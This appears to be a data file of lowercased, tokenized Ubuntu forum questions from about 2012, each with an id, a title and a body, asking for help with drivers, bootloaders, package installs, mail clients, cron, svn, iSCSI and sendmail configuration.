184089	lubuntu 12.04 on an ibm thinkpad t21	fairly new to linux in general , i 've tried it multiple times in the past but never really stuck . i 've had a t21 for ages and decided to use it when i 'm not in the mood to sit at my desktop on the couch . anyway i 've installed lubuntu 12.04 on it and have been happy with the operating system for all but one reason ... i ca n't do anything about the poor video performance . now i realize that a savage s3 mx/ix with only 8mb wo n't ever be anything special . i 've done some googleing and found a few things , such as xorg server no longer supports this card ( correct me if i 'm wrong please ) as it did in a 2.6.x kernel based os . glxgears gets all of 3-5 fps . 240p youtube videos absolutely kills it where as in xp which i dont want to go back to could handle it fairly smoothly . there is no additional drivers in jockey . i 've downloaded a dri savage s3 driver but fails to install because it requires a 2.6 kernel.. i 've searched synaptic for a 2.6 kernel to no avail . if anyone would have any suggestions for me to try it would be greatly appreciated . -xrs
184092	install android sdk on kubuntu	i 'm trying to follow the instructions for installing the android sdk found here : http : //developer.android.com/sdk/installing/adding-packages.html after i 've unpackaged and i run the android program under tools , i do n't get all the options that i 'm supposed to . the only 2 folders that show up are tools , and extras . under tools , it only shows the `` android sdk tools '' with the status `` installed '' . under the `` extras '' folder , i have nothing . i 've made sure that my http : proxy settings are correct . and i 've checked the logs . there are no errors . according to the android developer site , i 'm supposed to install the sdk platform tools . has anyone tried this on ubuntu ? i also checked and saw others were instructed to do an apt-get install ia32-libs but it failed for me . besides which , i am running the 32bit os ... so i do n't think i would need to install that ... ? ? i 've also tried following the instructions found here : http : //forums.team-nocturnal.com/showthread.php/772 but ... i ca n't seem to add the personal archive nilarimogard without getting an error message . when i attempt : sudo add-apt-repository ppa : nilarimogard/webupd8 i get the message : traceback ( most recent call last ) : file '' /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) root @ jll : /home/me/documents # any suggestions ? thanks .
184094	how add cpu frequency that should be available ?	i have a system with an intel core i7 970 that should be able to run at 3.2 ghz . i 'm running ubuntu 12.04 and installed the cpufreq indicator to be able to change the governor and noticed that i only had frequencies up to 2.0 ghz available to me . i set to performance and checked with cpufreq-info cpufreq-info -c 0 cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 4 5 6 7 8 9 10 11 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 1.60 ghz - 2.00 ghz available frequency steps : 2.00 ghz , 1.86 ghz , 1.73 ghz , 1.60 ghz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.60 ghz and 2.00 ghz . the governor `` performance '' may decide which speed to use within this range . current cpu frequency is 2.00 ghz ( asserted by call to hardware ) . cpufreq stats : 2.00 ghz:4.93 % , 1.86 ghz:0.03 % , 1.73 ghz:0.02 % , 1.60 ghz:95.02 % ( 718654 ) and to double check : $ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 1995000 1862000 1729000 1596000 how do i get all the frequencies that i should have available to me , all up to the 3.2 ghz ?
184095	thunderbird : missing folders after restore	before installing a new os i tried to backup my thunderbird by copying the .thunderbird directory . to be on the safe side i tried to emulate the restore procedure on another machine . i copied the .thunderbird directory to it and set up a symlink from /home/username/.thunderbird to this backup directory . thunderbird starts correctly , it shows plugins , calendar , address book , all news feeds and all mail accounts . but for pop accounts it shows only the inbox folder ( which is empty ) and the trash folder . all the other folders are missing ( archives , drafts , sent ) . what i have tried so far and it did not help : click 'repair folder ' from the menu folder ; delete .msf files to force thunderbird to rebuild index ; delete panacea.dat ; start thunderbird with -profilemanager to choose the particular profile directory ; all tips from the official documentation . it seems like thunderbird successfully restores all the information from the backup , except the folders and messages for pop mail accounts . any ideas regarding such a strange behavior of thunderbird ?
184097	`` could not save . disk full '' error message from ktimetracker	i keep getting the error message mentioned in my post from ktime tracker . i do n't know what made it start ... but it keeps popping up every few minutes , even if the app is not running . i found this link : http : //userbase.kde.org/ktimetracker/developing # how_to_reproduce_a_stale_lock but i do n't think i quite understand how i can use this information to resolve my problem . sorry . i 'm just new to linux . any suggestions would be appreciated . thanks .
184098	burg broken by windows	i have successfully installed , using super boot manager , burg in a computer at my work . after i boot into windows xp , burg is no longer operational . the machine just boots to the bios screen , goes black , and then boots to the bios screen again ad infinitum . the only way to recover i have found so far is to use a boot-repair usb , which restores either grub2 or mbr , not burg . everything works fine under grub2 , but i prefer the improved look of burg to make things easier on my students .
184100	if i install ubuntu to a usb with `` universal usb installer '' , will my windows be broken ?	when i tried installing ubuntu iso image to my usb drive , the universal usb installer displays this message : create syslinux mbr on ( h : ) - existing mbr will be overwritten if i click next , will my windows os be broken ?
184101	keeps asking for the cd how do i force it to stop asking for the cd	i have installed 12.04 and am attempting to update the wireless drivers ( i have a dell insiron 6400 ) , but it keeps asking for an installation cd that i do not have . how do i force it to stop asking for the cd and go to the network ? the commands i am running are : ~ $ sudo apt-get update ~ $ sudo apt-get install firmware-b43-installer ~ $ sudo apt-get remove bcmwl-kernel-source ~ $ sudo reboot it asks for the cd at step 2
184103	how to change boot device from pen drive to hard disk	i have installed ubuntu from a bootable pen drive . the installation is complete and is working well ... how can i change my primary boot device from pen drive to hard disk ?
184106	how do i install freesteam ?	while installing the freesteam software downloaded from the http : //sourceforge.net/projects/freesteam/ which is the only steam table software for ubuntu , i am getting following error : dependency is not satisfiable : libfreesteam1 . the description of package : python-freesteam , file name : python-freesteam_2.0_i386 ( 1 ) .deb please help me out as it is the only available opensource steam table software to be used by mechanical engineering student .
184107	xerox phaser 3100mfp not working	i have installed the latest version of ubuntu on my system . my problem is that i am not able to find and install the proper drivers for my printer/scanner combination ; the xerox phaser 3100mfp . although it is recognised by the system and my print jobs appear as completed , in fact they are not printed at all . what can i do ?
184108	should i backup /usr/local or not ?	does it contain the only packages i installed manually from sources or with aptitude ? if so i think i can easily reinstall all packages i had installed with aptitude . those few i built from sources are not much important to me to back them up .
184111	disable blank screen in 12.04	after my computer with ubuntu 12.04 has been idle for a short while , the screen will go blank , and even enter standby mode . i have tried this : system settings - > brightness and lock - > turn off screen ... set to `` never '' system settings - > power - > suspend when ... set to `` do n't suspend '' this does n't change anything . how can i make sure that the screen will always remain on , forever ?
184113	i have 2 different gedits ?	when i load gedit , it is different from sudo gedit . normal gedit gives me gtk warnings in the console , and ithas a different look . when i install plugins on either version , it does n't reflect on the other . i tried removing gedit and reinstalling , but i get the exact setups ( in other words , gedit did n't actually go away when i removed it ) any advice on how i can actually remove gedit and start over ? ( i have tried sudo apt-get remove -- purge gedit - no joy )
184115	hdmi and bumblebee , washed out colors and low resolution	iâm on a acer timelinex 3830tg , nvidia 540m , ubuntu 12.04 using the bumblebee drivers . i just connected my external monitor to my laptop using hdmi and there is output to it , however the contrast is all screwed up and the highest resolution i can set it too is 1680x1050 , but on vga i get 1920x1200 . what is going on and how do i fix it ? thanks ! !
184117	requires installation of untrusted packages ?	i tried installing vlc player yesterday , and i got the requires installation of untrusted packages error . i searched for hours for a solution to this problem , and finally came upon a suggestion that said to change servers for downloading updates from . i did this , and it gave me a 404 error when i clicked on `` check '' in the update manager . i tried switching my server back to the main one ( and after that , several other ones ) , but i am now still getting a 404 error : and the other error i get when downloading or updating : edit : output of cat /etc/apt/sources.list : deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse # added by software-properties deb http : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-security restricted main multiverse universe # added by software-properties deb http : //us.archive.ubuntu.com/ubuntu/ precise-security universe # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software .
184123	is it possible to run an application as superuser within boot without input ?	i have an ubuntu 12.04 desktop machine running as a server with no input devices accessible after initial setup . i need to place any application that i want to run within the boot process . i have one application that i want to run that requires superuser access to run . is there a way that i can automate that boot so i do n't have to enter my password ?
184124	wine and items in notification area	i have an app called dropbox . i installed it with the help of wine . well , i get the icon in the ubuntu notification area , but when i click on it to open it , it is transparent ( see attached image )
184126	if i reinstall the same system , it remains the same ?	i have problems with my system , and i have n't found any solution to them . to solve them , i decided to reinstall the same system , there 's an option that says something like `` install the system but saving the documents '' can i trust it ? will everything stay the same ? help .
184128	what 's the difference between `` purge '' and `` remove -- purge '' ?	what is the difference between sudo apt-get purge and sudo apt get remove -- purge ? there must be a difference or both of them should n't exist .
184130	convert pdf into image eye file	i need to convert pdf files into files with extension iei which is image eye thumbnail cache file . how do i do it ?
184134	eclipse -cdt can not start	i am using sun 's java 1.7.5 and installed through sudo apt-get install eclipse-cdt . i uninstalled/reinstalled eclipse and keep on having the same error message below i looked on the forum and tried copying the symlinks from jni to home , changing the alternative java to open jdk and reinstalled eclipse but can not launch eclipse . any ideas would be greatly appreciated . thanks ! ! session 2012-09-04 18:04:03.643 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=m20120208-0800 java.version=1.7.0_05 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86 -consolelog ! entry org.eclipse.osgi 4 0 2012-09-04 18:04:04.006 ! message bundle reference : file : org.eclipse.equinox.simpleconfigurator_1.0.200.v20110815-1438.jar @ 1 : start not found . ! entry org.eclipse.osgi 4 0 2012-09-04 18:04:04.019 ! message application error ! stack 1 java.lang.illegalstateexception : unable to acquire application service . ensure that the org.eclipse.core.runtime bundle is resolved and started ( see config.ini ) . at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:74 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( unknown source ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( unknown source ) at java.lang.reflect.method.invoke ( unknown source ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 )
184135	gloobus-preview won ' t play any video and audio ( ubuntu 12.04 on mbp )	my newly installed gloobus won ' t load video or audio files . it can load mp4 video but only outputs the audio , it won ' t show any image from the video file . it used to work fine on a previews install of 12.04 on the same machine . it can still preview images though .
184139	how can i undo this hostapd tutorial ?	i was following this to try and set up a usable hotspot for my s3 and xbox 360 http : //thenewbieblog.wordpress.com/2012/05/01/wifi-hotspot-setup-on-ubuntu/ now when i go into network > wireless nothing shows up and the hotspot option no longer works there . two things i 'd like to do : 1 ) restore my laptops ability to use wifi 2 ) create a hotspot that the two devices can connect to at the same time not sure what other info should be provided so feel free to ask .
184146	wifi and bluetooth stopped workig	i am running ubuntu 11.04 on a laptop and recently both bluetooth and wireless internet stopped working for no reason ( maybe because of an update ? accidentally pressing a key combination ? ) . ifconfig -a gives me eth0 , lo , and wlan . nm-tool gives me eth0 and wlan are unavailable . running lshw -c network , recognizes wireless interface but says -netwok disabled . running rfkill list lists bluetooth and wireless lan . both bluetooth and wireless are disabled in windows too . i tried to play with fn-fx keys ; no luck . not sure what to do now .
184148	encrypting and decrypting single file with master password and passphrase	last night my system shutdown unexpectedly and when i restart it , it gave me superblock error . will then i fixed a little but . i was able to retrive my encrypted files which i encrypted my pgp public key but i was not able to retrive my private key or public key now i have ecrypted file which can not be open because i have lost my private key . is there any way that i can encrypt my file by providing only master password and passphrase and no physical key or private key and when i am on another computer i can easily open it my same master password and passphrase . thanks in advance
184152	how to create a sliding widget ( gtk+ , quickly )	recently i 've seen this widget in gedit : it appears when you press ctrl + f. what i am interested is in how to get the sliding effect . any suggestion will be appreciated .
184155	where to install grub ?	so , my partition table looks like : /dev/sda /dev/sda1 16708mb ( windows recovery environment ( loader ) ) /dev/sda2 367mb ( windows 7 ( loader ) ) /dev/sda3 368203mb ( windows 7 files ) /dev/sda5 348000mb ( where i am mounting / ) /dev/sda6 16874mb ( swap ) so , looking at that there are two loaders there already , ubuntu gives me the option of installing grub to : /dev/sda /dev/sda1 /dev/sda2 /dev/sda3 /dev/sda5 now i am not sure where i should install grub , in the root , over the top of the windows 7 loader , or in the ubuntu / partition ?
184164	how to completely remove other versions of java on 11.10 ?	i have been trying to install java on my dedicated server . i have partially installed multiple versions of java and now can not un-install them as they all have dependencies . whenever i try and un-install i get : errors were encountered whilst processing : openjdk-6-jre-headless openjdk-6-jre e : sub-process /usr/bin/dpkg returned an error code ( 1 ) re-install ca n't be done unless i contact my host and pay 15 $ .
184167	how can i create a partition without the usage of live cd nor usb ?	translation is it possible to create a partition when using the system ? when i try to do it on gparted , it seems that the options are disabled because of the disk is mounted and it can not be unmounted because of i am using it in the system . i wish to create a new partition without removing or affecting the file system ; just creating a new partition , but without the need to use a live cd or usb . ¿cómo crear una partición sin usar live cd ni usb ? ¿es posible crear una partición estando en el sistema ? ya que cuando lo intento desde gparted , al parecer están desactivadas las opciones porque la unidad está montada y no se puede desmontar ya que estoy usando el sistema . quiero crear una nueva partición pero sin quitar o afectar el sistema de archivos ; sólo crear una nueva partición , pero sin live cd o usb .
184175	is adobe flash 11.2 working with nvidia hardware again ?	i installed the newest nvidia-linux drivers version number 304.43 on 12.04 installation and all flash videos now show me `` accelerated video rendering '' . previous nvidia drivers + adobe flash only rendered in software , at least since adobe officially said they turned off `` hardware acceleration '' for linux , because of unstable and unsecure drivers . has this changed ? is hardware acceleration really back ? can anyone verify this as well ? the nvidia driver 304.43 patch notes said : fixed a bug that caused vdpau to hang when expanding the youtube flash player . hardware : nvidia 8600m gt
184180	xmonad changes font in terminal	when i fire up a gnome-terminal in 12.04 this is the sort of font i get : i really like it and want to keep it . when i run xmonad and fire up a gnome-terminal i get this sort of font : why are they different , and more importantly , how can i change it so that i get the first font when i use xmonad ?
184181	rhythmbox wo n't import or play flac files	i have a new installation of 12.04 and i just copied over all my music to the ~/music folder . rhythmbox found all the mp3 and ogg files , but it refuses to import flac files . they simply do not appear in my music library . if i start rhythmbox on the command line and try to import a folder that contains flac files , absolutely nothing happens . nothing is imported ; no error messages . i have all the dependencies for rhythmbox installed , along with all the suggested and recommended packages . i can play a flac file with gst-launch-0.10 and gst-typefind-0.10 correctly identifies flac files as audo/x-flac . why does rhythmbox refuse to see flac files ? what can i do to find out what is happening ?
184182	i want to play mp3 in rythmbox but it says python v2 plugins requires mpeg-1 layer mp3 decoder but i dont have internet on that computer,	because i use internet from usb device which supports only on windows , and when i downloaded offline files from packages.ubuntu.com and linuxappsfinder.com and tried to install them in ubuntu , i just double clicked on such file ( whose format extension was .deb ) , then it opened in ubuntu software center but said , dependency is not supported , how can i install softwares and plugins or codecs in ubuntu , without internet ? i tried to make file through terminal using zipped files , ( tar.bz2 ) , but said something xml not found .
184183	why is n't cron running my script ?	now i want to use backup and whenever gem to automatic backup my database . when i connect the server by ssh as an added user to run backup perform -t my_backup , it works well.but the cron file : 0 22 * * * /bin/bash -l -c 'backup perform -t my_backup' ca n't run at 22:00 . when i use cat /etc/crontab check the cron 's config file , it is : shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # the /bin/bash and /bin/sh are different.what 's the reason ? how to do ?
184187	do i have to completely reinstall ubuntu now that it wo n't boot ?	i just tried installing software called teamviewer . it said there was some kind of error with unresolved dependancies . then i realized i was trying to install the 32 bit version , but i needed to install the 64 bit version . so i tried that , and i got an error saying that ubuntu needed to do a partial upgrade . i thought that was weird , so i just wanted to abandon installing anything and get out of this . i exited all programs and rebooted , and now i ca n't get back into ubuntu . after the grub screen i get a black screen and no login options . if i boot into recovery , i get the following screen : i booted up a live cd of 12.04 to see if that could help , but it seems the only option is to completely reinstall ubuntu . can i repair this in any way , or is my only option to make a fresh install ?
184188	how to maximize java resources for gaming ?	i notice that when i play minecraft , my cpu usage is only around 15 to 20 percent , at most . is it possible to force my computer to allocate as much ram , cpu time , etc . to the game , in order to get the best experience possible ? or , is the low cpu usage due to limitations in the jvm or the game code itself ? i have optifine installed , and i 've already tried using renice to change the process priority and -xmx to allocate more memory to java . what else can i do ?
184192	how can i access old kmail emails after upgrading to ubuntu 11.10 ?	i initially installed ubuntu 11.04 and used kmail for my email . all well and good . then i upgraded to ubuntu 11.10 . presumably an upgrade of kmail took place as part of this . now kmail wo n't even run ; when i try , it tells me `` failed to fetch the resource collection '' and crashes . i do n't mind switching to another email client , but i 'd very much like to be able to recover all of the emails i have stored in kmail . any suggestions on how to do this ? thanks for any help anyone can provide .
184196	gnome start search window	when i start my computer using gnome ( well , gnome + xmonad ) , this search window appears that prompts me to search my computer . i 'd really like to disable that . any thoughts ?
184200	should i install the proprietary ( restricted ) driver ?	i have a sony vaio e series laptop with the amd radeonâ˘ hd 7650m . everything seems to be working fine , but ubuntu is telling me that i could install the restricted driver . my basic question is , what would i gain/lose from installing this driver ? also , it lists two drivers : the fglrx driver , and then the post-release updates fglrx driver . if i was to use the restricted drivers which one would i use ?
184204	how do i fetch only the numbers in grep ?	i have file like this : other lines . . . blah blah blah ( :34 ) i wish to find the occurrence of numbers in the above file . i came up with : grep [ 0-9 ] filename but that is printing the whole : blah blah blah ( :34 ) rather i want only 34 . is there any way to do so ?
184206	vim : command not found	i 'm trying to install openflow in ubuntu , but i encounter a problem when installing regression suite . i follow the instruction from openflow website with the below lines to update the of_root environment variable for your setup : cd ~/ cp < openflow-dir > /regress/scripts/env_vars . vim env_vars but when i run vim env_vars , i get a vim : command not found error . why ?
184207	how do i get xdg icons in dolphin ?	in kde , dolphin does not show the xdg icons for the user directories in my home folder , e.g. , music , downloads , documents , etc . it shows the generic folder icon for all directories . how can i make dolphin show the standard icons from the current icon theme ?
184210	question about changing the boot order+advice before installing ubuntu	so here are my two questions : boot order hi , as per the guides given in the ubuntu.com help wiki , i 'm supposed to ensure that my boot order is set to give highest priority to the cd drive first and then the hard drive before trying to install ubuntu . so i went to my bios set up , and under boot options , the boot order was set to : sata pm : tsstcorp cdd vdw sh 2 ( 1st priority ) sata sm : wdc wd5000aakx003ca ( 2nd priority ) those are also the only two options available for the boot order . can anyone help me understand what these boot order options represent ? are things already the way they 're supposed to be , prior to my ubuntu installation attempt ? advice regarding the 'allocate drive space ' dialog box of the installer- which option to select ? hi , i 'm running a windows 7 system at the moment with one physical hard drive , partitioned into 3 during the windows installation : c ( 97 gb , this is where windows is installed ) , d ( 255 gb , i 'd like to keep this as a shared partition between windows and ubuntu where i keep my media ) and e ( 107 gb , this is where i would like to install ubuntu ) . considering this will be my first time trying to install an os , so i have zero experience , which option from the allocate drive space screen of the ubuntu installer should i use : . install ubuntu 12.04 lts alongside ( other operating systems ) ; or , . something else ( advanced ) the first option sounds the most automated ( so i have a smaller chance of accidentally changing something i should n't ) , while the second option is clearly labelled advanced . my question is : will the first option allow me to properly select the e drive for installing ubuntu , or will it try to automatically install it in c ? another concern : as per this webpage ( http : //news.softpedia.com/news/installing-ubuntu-12-04-lts-266201.shtml ) , choosing option 1 will result in `` remember that , after the installation , the windows boot loader will be overwritten by the ubuntu boot loader ! '' this sounds rather ominous- is it liable to cause problems for running windows ? basically , which option would be best suited for my target installation situation ? thank you .
184217	why most people recommend to reduce swappiness to 10-20 ?	i have seen in several site which recommend to reduce swappiness to 10-20 for better performance . http : //community.linuxmint.com/tutorial/view/998 https : //sites.google.com/site/easylinuxtipsproject/bugs http : //www.howtogeek.com/115797/6-ways-to-speed-up-ubuntu/ http : //www.upubuntu.com/2012/06/11-tips-to-speed-up-computers-running.html is it a myth or not ? is this a general rule ? i have a laptop with 4gb ram and 128gb ssd hard , what value do you recommend for my swappiness ? thanks .
184219	setup svn and checkout	when i try to do svn checkout using this svn co svn : //ipaddress/var/svn/ulf/project myproject i get the error svn : ca n't connect to host 'ipaddress ' : connection refused if i use svn co svn+ssh : //username @ ipaddress/var/svn/ulf/project it asks me for password after entering valid password i get : svn : authentication failed i want to checkout using htp : //url/var/svn need help asap note : putting svn/ folder under /var am i doing right ? i have given permission to ulf folder , which is my svn repos folder , which has conf/ db/ format/ locks/ hooks/ svn-commit.tmp
184222	left mouse button not working in xubuntu session	i recent changed from ubuntu to xubuntu 12.04 . the install worked great for a few days , but suddenly the left mouse button stopped working . the right click and scroll bars work fine . after a bit of experimenting i discovered that the problem only happens when i set the session to xubuntu at login . the mouse also works fine in my dual-booted windows vista . what could make my mouse stop working like that ?
184228	can someone explain me the find command behavior that i use ?	can any one tell me why the following command wo n't run : find ./assign/*.c -exec cp ./assign2 { } \ ; and what 's the difference when i do the following ( which actually runs ) : find ./assign -type f -name *.c -exec cp { } ./assign2 \ ;
184229	how do i install/compile corsika & fluka for 32-bit ubuntu 12.04 ?	i want to use some programs ( corsika and fluka ) which are essentially designed for 32 bit systems . i 've installed the 32-bit version of 12.04 on my system ( intel® core™ i7-2700k cpu @ 3.50ghz × 8 ) . before this i had installed ubuntu 9.10 ( 32-bit ) on an older system and installed g77 from hardy repositories , compiled those programs without any problem . but this time when changing the repositories , g77 could not be installed even i removed all the things that i thought make this installation impossible , for example i need gcc-3.4 and removed all newer versions and tried to install them from hardy repositories . now , with the g77 package installed , corsika does not compile , and when i remove g77 , fluka does not compile . i received a error messages like this : crt1.o not found in /usr/bin/lb in fact these '.o ' files do not exist on my system user/bin/lb i have no directory /lb there so i do not know how to link it . can someone please explain how to get both packages installed ?
184234	openconnect problems on ubuntu 12.04	getting problems on the ubuntu 11.04 for openconnect ... the failure after connecting says : got connect response : http/1.1 200 ok cstp connected . dpd 30 , keepalive 20 connected tun0 as 172.21.246.21 , using ssl dtls handshake failed : 2 i thought it is a kernel fault so i updated to 12.04 which did n't change the message . it could be that the vpnc-script has the problem . is there any workaround for this issue ? i already got the vpnc package and downloaded the /etc/vpnc/vpnc-script
184242	how can i map layout switching on caps lock and swap caps with escape simultaneously with xkb ?	i can only set separately : switching layouts on caps lock or swap escape and caps lock keys , but has no success in trying to do it simultaneously . the final variant i want is to get caps lock behavior like escape key and use escape key for layout switching . i have tried something like this : setxkbmap -option grp : switch , grp : caps_toggle , grp_led : caps , caps : swapescape us , ru
184243	how to run asp.net in ubuntu using apache	my office server run on windows 2008 server and i want to shift to ubuntu server but the problem is that all my application are based on asp using dot net framework 4.0 , so how do i configure to run in ubuntu . i have heard about apache .
184244	can not backup evolution folders	after using ubuntu since 5.04 i upgraded to 12.04 5 days ago . then the .evolution folder showed only an empty tasks folder . i need to save my mail folder contents ( hundreds of emails ) but only get errors when i try . will mail folders be kept if i remove evolution and re-install ? the contacts and calender i can rebuild . i have read many posts and tried starting evolution -- offline several times after copying back folders from my .evolution backup with no success . the last attempt showed : chas @ chas-desktop : ~ $ evolution -- offline ** ( evolution:5224 ) : critical ** : categories_icon_theme_hack : assertion `filename ! = null & & *filename ! = '\0 '' failed ( evolution:5224 ) : evolution-shell-critical ** : shell_settings_pspec_for_key : assertion `schema_name ! = null ' failed migrating cached data migrating config data migrating local user data now the .evolution folder has disappeared . thanks for your attention . chas
184248	iscsi iscsi_trgt sess_param_check ( 55 ) default_retain_time is out of range	clustered iscsi target has been installed based on ubuntu server 12.04 amd64 . target is working , but i have few kernel messages , when heartbeat starts iscsi service . sep 5 08:47:58 cluster01 kernel : [ 417.004662 ] iscsi_trgt : sess_param_check ( 55 ) default_retain_time : 20 is out of range ( 0 0 ) sep 5 08:47:58 cluster01 kernel : [ 417.028006 ] iscsi_trgt : sess_param_check ( 54 ) max_outstanding_r2t : 8 is out of range ( 1 1 ) i did'nt find any descrition of these messages over entiregoogle . here is my target definition in ietd.conf : target iqn.2012-08.hu.mod : storage.redmine lun 0 path=/dev/drbd6 , type=blockio , scsiid=mod-redmine , scsisn=mod-redmine alias redmine maxconnections 1 maxsession 0 initialr2t yes immediatedata no maxrecvdatasegmentlength 8192 maxxmitdatasegmentlength 8192 maxburstlength 262144 firstburstlength 65536 defaulttime2wait 2 defaulttime2retain 20 maxoutstandingr2t 8 datapduinorder yes datasequenceinorder yes errorrecoverylevel 0 headerdigest crc32c , none datadigest crc32c , none wthreads 32 can you please give me any advice , how can i solve this problem ? thank you & bet regards istvan
184251	why ca n't the nagios user send mails using `` sendmail '' ?	i have installed nagios for monitoring and sendmail for sending mails . when testing from root account i am receiving mails , but i 'm not receiving mails when i send it from nagios account . i have googled and found that only root user can send mails using sendmail mta . how to enable sendmail to send mails from nagios account ? note that i do n't send messages directly from the local machine , but instead use my isp/provider relay . the below logs show the error from the relay when the message comes from nagios @ , but not when it comes from root @ . output from nagios user : cat /var/log/maillog sep 19 15:52:32 ubuntubackup-chennai sendmail [ 6088 ] : q8jamwxz006088 : from=nagios , size=237 , class=0 , nrcpts=1 , msgid= < 201209191022.q8jamwxz006088 @ localhost.localdomain > , relay=nagios @ localhost sep 19 15:52:32 ubuntubackup-chennai sendmail [ 6089 ] : q8jamwcn006089 : from= < nagios @ localhost.localdomain > , size=517 , class=0 , nrcpts=1 , msgid= < 201209191022.q8jamwxz006088 @ localhost.localdomain > , proto=esmtp , daemon=mta , relay=localhost.localdomain [ 127.0.0.1 ] sep 19 15:52:32 ubuntubackup-chennai sendmail [ 6088 ] : q8jamwxz006088 : to=karthick.murugadhas @ ****.com , ctladdr=nagios ( 496/492 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30237 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( q8jamwcn006089 message accepted for delivery ) sep 19 15:52:32 ubuntubackup-chennai sendmail [ 6091 ] : q8jamwcn006089 : to= < karthick.murugadhas @ ****.com > , ctladdr= < nagios @ localhost.localdomain > ( 496/492 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=120517 , relay=smtp10.netcore.co.in . [ 202.162.229.32 ] , dsn=4.7.1 , stat=deferred : 450 4.7.1 < nagios @ ****.com > : sender address rejected : please checked sender domain output from root user : cat /var/log/maillog sep 19 15:43:29 ubuntubackup-chennai sendmail [ 5158 ] : q8jadtt2005158 : from=root , size=237 , class=0 , nrcpts=1 , msgid= < 201209191013.q8jadtt2005158 @ localhost.localdomain > , relay=root @ localhost sep 19 15:43:29 ubuntubackup-chennai sendmail [ 5159 ] : q8jadtfo005159 : from= < root @ localhost.localdomain > , size=511 , class=0 , nrcpts=1 , msgid= < 201209191013.q8jadtt2005158 @ localhost.localdomain > , proto=esmtp , daemon=mta , relay=localhost.localdomain [ 127.0.0.1 ] sep 19 15:43:29 ubuntubackup-chennai sendmail [ 5158 ] : q8jadtt2005158 : to=karthick.murugadhas @ ****.com , ctladdr=root ( 0/0 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30237 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( q8jadtfo005159 message accepted for delivery ) sep 19 15:43:30 ubuntubackup-chennai sendmail [ 5161 ] : q8jadtfo005159 : to= < karthick.murugadhas @ ****.com > , ctladdr= < root @ localhost.localdomain > ( 0/0 ) , delay=00:00:01 , xdelay=00:00:01 , mailer=relay , pri=120511 , relay=smtp10.netcore.co.in . [ 202.162.229.32 ] , dsn=2.0.0 , stat=sent ( _smr_smtp9.netcore.co.in ok : queued as 29ce7f6d4c ) update 1 : sendmail.mc configuration file is here .
